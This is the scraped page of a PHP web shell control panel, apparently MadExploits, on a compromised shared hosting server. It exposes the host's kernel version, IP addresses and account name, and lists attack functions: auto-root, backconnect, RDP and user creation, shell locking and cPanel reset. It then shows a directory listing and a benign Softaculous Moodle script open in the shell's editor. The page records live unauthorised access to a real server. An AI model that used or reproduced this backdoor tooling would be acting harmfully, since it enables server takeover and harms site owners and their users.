Linux premium180.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
LiteSpeed
: 162.0.209.168 | : 216.73.216.187
Cant Read [ /etc/named.conf ]
8.3.30
nortrmdp
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
var /
softaculous /
moodle311 /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
languages
[ DIR ]
drwxr-xr-x
php53
[ DIR ]
drwxr-xr-x
php56
[ DIR ]
drwxr-xr-x
php71
[ DIR ]
drwxr-xr-x
php81
[ DIR ]
drwxr-xr-x
php82
[ DIR ]
drwxr-xr-x
NOTES.txt
2.24
KB
-rw-r--r--
add_admin.php
733
B
-rw-r--r--
check_utf8.php
6.99
KB
-rw-r--r--
clone.php
5.47
KB
-rw-r--r--
config.php
745
B
-rw-r--r--
edit.php
4.61
KB
-rw-r--r--
edit.xml
433
B
-rw-r--r--
extend.php
12.42
KB
-rw-r--r--
fileindex.php
933
B
-rw-r--r--
get_plugin_list.php
840
B
-rw-r--r--
import.php
7.51
KB
-rw-r--r--
info.xml
3.51
KB
-rw-r--r--
install.js
924
B
-rw-r--r--
install.php
10.75
KB
-rw-r--r--
install.xml
2.73
KB
-rw-r--r--
md5
2.97
KB
-rw-r--r--
privatekey.php
786
B
-rw-r--r--
update_pass.php
541
B
-rw-r--r--
upgrade.php
8.84
KB
-rw-r--r--
upgrade.xml
307
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : get_plugin_list.php
<?php @unlink(__FILE__); // Validate if the request is from Softaculous if(php_sapi_name() == 'cli'){ if($argv[1] != '--pass=[[autopass]]'){ die("Unauthorized Access"); } if(isset($_SERVER['REMOTE_ADDR'])){ unset($_SERVER['REMOTE_ADDR']); } // Define CLI_SCRIPT before including config.php define('CLI_SCRIPT', true); }else{ if($_REQUEST['pass'] != '[[autopass]]'){ die("Unauthorized Access"); } } require('config.php'); $pluginman = core_plugin_manager::instance(); $plugins_list = array(); foreach ($pluginman->get_plugins() as $type => $plugins) { foreach ($plugins as $shortname => $plugin) {; if ($plugin->source == core_plugin_manager::PLUGIN_SOURCE_EXTENSION) { $plugins_list[] = $plugin->rootdir; } } } echo '<moodle_plugins>'.json_encode($plugins_list).'</moodle_plugins>'; ?>
Close